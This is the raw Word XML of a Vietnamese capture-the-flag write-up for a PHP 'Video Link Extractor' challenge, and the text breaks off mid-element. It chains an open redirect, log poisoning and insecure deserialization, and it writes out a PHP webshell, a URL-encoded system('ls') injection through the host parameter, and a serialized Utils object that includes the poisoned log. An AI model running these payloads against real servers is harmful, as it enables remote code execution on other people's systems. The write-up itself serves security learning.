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FCA693" w14:textId="2CCFF2EA" w:rsidR="00CD7388" w:rsidRPr="00240774" w:rsidRDefault="00CD7388" w:rsidP="00CD7388">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Video Link Extractor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A983DBD" w14:textId="77777777" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0C3DCB" w14:textId="4D8F395B" w:rsidR="002F49FE" w:rsidRDefault="00A0418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bị dính lỗ hổng insecure deserialization trong php, yêu cầu bạn kết hợp nhiều kĩ thuật khác nhau để khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB32124" w14:textId="690B6294" w:rsidR="00A0418F" w:rsidRDefault="00A0418F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D1B562" w14:textId="40A6BAEC" w:rsidR="00A0418F" w:rsidRDefault="00A0418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Let’s go!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575DC740" w14:textId="43B1C215" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="156F85AF" w14:textId="6E291DDF" w:rsidR="00CD7388" w:rsidRPr="00240774" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phân tích trang web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42228FAF" w14:textId="42EF01EB" w:rsidR="00A0418F" w:rsidRDefault="00A0418F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662969F0" w14:textId="1D059D4D" w:rsidR="00A0418F" w:rsidRDefault="00A0418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</w:t>
      </w:r>
      <w:r w:rsidR="00CD7388">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4301B2E4" w14:textId="3338BA95" w:rsidR="00A0418F" w:rsidRDefault="00A0418F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225AB33B" w14:textId="2625FA56" w:rsidR="00A0418F" w:rsidRDefault="00A0418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A778FA" wp14:editId="533B5483">
            <wp:extent cx="5378116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14"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5378116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1796E" w14:textId="65B87033" w:rsidR="00A0418F" w:rsidRDefault="00A0418F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6345AB26" w14:textId="02C3BF54" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8FA9EC" w14:textId="5B8C3771" w:rsidR="00CD7388" w:rsidRDefault="00CD7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cho bạn xem thông tin của video:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D37E084" w14:textId="53ACE219" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6AB120" w14:textId="7B704DF0" w:rsidR="00CD7388" w:rsidRDefault="00CD73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679558" wp14:editId="7A6F789C">
            <wp:extent cx="5943600" cy="1035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EE85" w14:textId="7BBE6484" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="522317A9" w14:textId="443FD25D" w:rsidR="00CD7388" w:rsidRDefault="00CD7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Khi bạn chọn “Extract” nó sẽ thực thi script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76010A" w14:textId="4D12D2DF" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6630809D" w14:textId="5FFFAB44" w:rsidR="00CD7388" w:rsidRDefault="00CD73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C4CF68" wp14:editId="33C9CE64">
            <wp:extent cx="5943600" cy="7759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40D8" w14:textId="793333D3" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C5816CB" w14:textId="79CB2AAE" w:rsidR="00CD7388" w:rsidRDefault="00CD73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Script này sẽ gửi yêu cầu sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02315A23" w14:textId="3A5BAD2F" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0FADF4" w14:textId="2245BE47" w:rsidR="00CD7388" w:rsidRDefault="00CD7388">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD7388">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Request: </w:t>
      </w:r>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /index.php?mode=extract&amp;id=lmJPeFW75qQ&amp;host=youtube</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6413D052" w14:textId="672BB713" w:rsidR="00A0418F" w:rsidRDefault="00A0418F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131B3337" w14:textId="12283780" w:rsidR="00A0418F" w:rsidRDefault="008120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Dữ liệu trả về sẽ được thêm trong thẻ div:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4FA702" w14:textId="29C6C3C8" w:rsidR="008120E3" w:rsidRDefault="008120E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49519125" w14:textId="2BE5E3DF" w:rsidR="008120E3" w:rsidRDefault="008120E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FEE32FC" wp14:editId="5C8ABDD0">
            <wp:extent cx="2908300" cy="30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3B419" w14:textId="798CDF32" w:rsidR="008120E3" w:rsidRDefault="008120E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C5B73CE" w14:textId="1CEA6992" w:rsidR="008120E3" w:rsidRDefault="008120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Máy chủ sẽ xử lí như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3571AD67" w14:textId="65160E66" w:rsidR="008120E3" w:rsidRDefault="008120E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A335D63" w14:textId="67E0D131" w:rsidR="008120E3" w:rsidRDefault="008120E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48BD2D2" wp14:editId="5936A884">
            <wp:extent cx="4993105" cy="3681881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895" cy="36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625C2" w14:textId="0A973AA6" w:rsidR="008120E3" w:rsidRDefault="008120E3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E06BA6E" w14:textId="77777777" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B196F1" w14:textId="53DCF097" w:rsidR="008120E3" w:rsidRPr="00240774" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA2CE9B" w14:textId="432AE52D" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FA6D9AB" w14:textId="25712547" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2D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bị dính lỗ hổng open redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2848FB" w14:textId="77777777" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1B1461" w14:textId="0684A0D3" w:rsidR="00FB2DA9" w:rsidRPr="00240774" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /index.php?mode=redirect&amp;url=https://xuanthulab.net/su-dung-session-va-cookie-trong-php.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A77C0" w14:textId="7770C3F5" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1A8B96" w14:textId="48601C9D" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2D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Một mình lỗ hổng này thì không làm được gì cả, mình sẽ kết hợp với 1 lỗ hổng khác là insecure deserialization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3693FE" w14:textId="1D3EBF3E" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B3B5DA2" w14:textId="73E73248" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2D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Một đối tượng thuộc lớp Utils có các thuộc tính</w:t>
      </w:r>
      <w:r w:rsidR="00240774">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sau</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B27B1A" w14:textId="6A296B49" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5205BD5D" w14:textId="7602F1D5" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2D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291732" wp14:editId="7B689401">
            <wp:extent cx="1983976" cy="13114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866" cy="131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61CD" w14:textId="73EB435E" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2DA9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="238466C2" w14:textId="15D842ED" w:rsidR="00FB2DA9" w:rsidRDefault="00FB2D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Trong hàm extract_video_information(), </w:t>
      </w:r>
      <w:r w:rsidR="009677CE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nếu bạn để sai host, nó sẽ ghi log:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248C3EEA" w14:textId="33564F0E" w:rsidR="009677CE" w:rsidRDefault="009677CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A0B8FC0" w14:textId="5896B894" w:rsidR="009677CE" w:rsidRDefault="009677C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F97EB19" wp14:editId="0897C113">
            <wp:extent cx="3403600" cy="1219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DAF6" w14:textId="77777777" w:rsidR="009677CE" w:rsidRDefault="009677CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1123A0D5" w14:textId="5091105D" w:rsidR="009677CE" w:rsidRDefault="009677C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66FE14" wp14:editId="40D6ABA0">
            <wp:extent cx="3898900" cy="1066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9760" w14:textId="4384DD41" w:rsidR="009677CE" w:rsidRDefault="009677CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B28D6EF" w14:textId="0BE8E84D" w:rsidR="009677CE" w:rsidRDefault="00967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sẽ tận dụng chức năng này để ghi webshell vào log. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01247A5D" w14:textId="6F76F196" w:rsidR="009677CE" w:rsidRDefault="009677CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411F035A" w14:textId="3C2A3174" w:rsidR="009677CE" w:rsidRDefault="00967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host,id,mode là 3 tham số bạn kiểm soát được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEFDE22" w14:textId="2329725B" w:rsidR="009677CE" w:rsidRDefault="009677CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0814C2C9" w14:textId="5B229465" w:rsidR="009677CE" w:rsidRPr="00240774" w:rsidRDefault="009677CE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Webshell: </w:t>
      </w:r>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;?php system("cat flag.php") ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3CC25" w14:textId="1EDB7F09" w:rsidR="00DF5AE5" w:rsidRDefault="00DF5AE5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="329DE5E1" w14:textId="773446D6" w:rsidR="00CB495C" w:rsidRPr="00240774" w:rsidRDefault="00DF5AE5" w:rsidP="000E4F31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gửi yêu cầu: </w:t>
      </w:r>
      <w:r w:rsidR="000E4F31">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB495C" w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GET /index.php?mode=extract&amp;id=lmJPeFW75qQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A53CB5" w14:textId="2B8E7BAD" w:rsidR="00DF5AE5" w:rsidRPr="00240774" w:rsidRDefault="00CB495C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&amp;host</w:t>
      </w:r>
      <w:r w:rsidR="006004F8" w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=%3c%3fphp%20echo%20system('ls')%20%3f%3e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142B601C" w14:textId="5F12D7DB" w:rsidR="000E4F31" w:rsidRDefault="000E4F31">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56274954" w14:textId="1CECB00C" w:rsidR="006004F8" w:rsidRDefault="000E4F3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E99E3E3" wp14:editId="6CCD596E">
            <wp:extent cx="6093570" cy="2105526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45" t="16195" r="38050" b="56271"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6126507" cy="2116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C71FA" w14:textId="452D71F7" w:rsidR="00CB495C" w:rsidRDefault="00CB495C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B79EB04" w14:textId="1EC2721B" w:rsidR="00CB495C" w:rsidRDefault="00CB495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thấy “Invalid host …” là thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A03234" w14:textId="30B2B7CE" w:rsidR="00240774" w:rsidRDefault="00240774">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5342152E" w14:textId="54BAF002" w:rsidR="00240774" w:rsidRDefault="00240774">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tên của file log là time() nên mình dễ đoán được.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340ED67A" w14:textId="3846D525" w:rsidR="009677CE" w:rsidRDefault="009677CE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="106BC995" w14:textId="05713CDF" w:rsidR="009677CE" w:rsidRDefault="009677C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File log: </w:t>
      </w:r>
      <w:r w:rsidR="00AF1327">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF1327" w:rsidRPr="00AF1327">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/tmp/1704637522.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A326F9" w14:textId="4824F166" w:rsidR="00CB495C" w:rsidRDefault="00CB495C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C4DB5BD" w14:textId="3BC5FCA3" w:rsidR="00F61615" w:rsidRDefault="00F616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May mắn là file trong thư mục tạm không bị xóa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AECD0E1" w14:textId="77777777" w:rsidR="00F61615" w:rsidRDefault="00F61615">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496E5312" w14:textId="31D95ACB" w:rsidR="00287C44" w:rsidRDefault="00287C4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sao để include file trên?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CFDE0" w14:textId="28247C4D" w:rsidR="00287C44" w:rsidRDefault="00287C44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC16E9E" w14:textId="697D359E" w:rsidR="00287C44" w:rsidRDefault="00287C4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bạn include 1 file có định dạng bất kì: .log, .txt có webshell thì vẫn thực thi được code php.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091BB09C" w14:textId="77777777" w:rsidR="00287C44" w:rsidRDefault="00287C44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4849AC92" w14:textId="76A5CBA8" w:rsidR="00287C44" w:rsidRDefault="00287C4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714F07F" wp14:editId="2A902345">
            <wp:extent cx="3765884" cy="2242116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557" cy="224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D1B5" w14:textId="77A5CF55" w:rsidR="00287C44" w:rsidRDefault="00287C44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0FEAEA" w14:textId="569C617B" w:rsidR="00287C44" w:rsidRDefault="00287C4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Method magic __wakeup sẽ thực thi khi bạn unserialize 1 đối tượng thuộc lớp Utils.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48548227" w14:textId="6D11DD2B" w:rsidR="00F61615" w:rsidRDefault="00F61615">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="615EB401" w14:textId="77777777" w:rsidR="00F61615" w:rsidRDefault="00F61615">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27EBD45D" w14:textId="72358B4F" w:rsidR="00FB2DA9" w:rsidRDefault="00287C4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0644AA4" wp14:editId="35987B69">
            <wp:extent cx="4451775" cy="2658979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167" cy="267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E3A2E" w14:textId="077AC085" w:rsidR="00F61615" w:rsidRDefault="00F61615">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B385E93" w14:textId="678C1C11" w:rsidR="00F61615" w:rsidRDefault="00F6161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sẽ tạo 1 đối tượng thuộc lớp Utils</w:t>
      </w:r>
      <w:r w:rsidR="00AF1327">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> có </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thuộc tính _file là webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08885F7F" w14:textId="3B652510" w:rsidR="00F61615" w:rsidRDefault="00F61615">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="324BA4D0" w14:textId="12E236E2" w:rsidR="00AC7959" w:rsidRPr="00240774" w:rsidRDefault="00C40A6D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00240774">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O:5:"Utils":1:{s:5:"_file";s:19:"/tmp/1704637522.log";}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6025B1" w14:textId="045811B1" w:rsidR="00C40A6D" w:rsidRDefault="00C40A6D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41AB6F18" w14:textId="32E3FD6F" w:rsidR="000E4F31" w:rsidRDefault="000E4F31">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E4F31">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để ý case local, có thể concat với id, lợi dụng mode redirect, tạo payload và trỏ tới một server public của mình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240C78A0" w14:textId="6F7E538D" w:rsidR="00AC7959" w:rsidRDefault="00AC7959">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
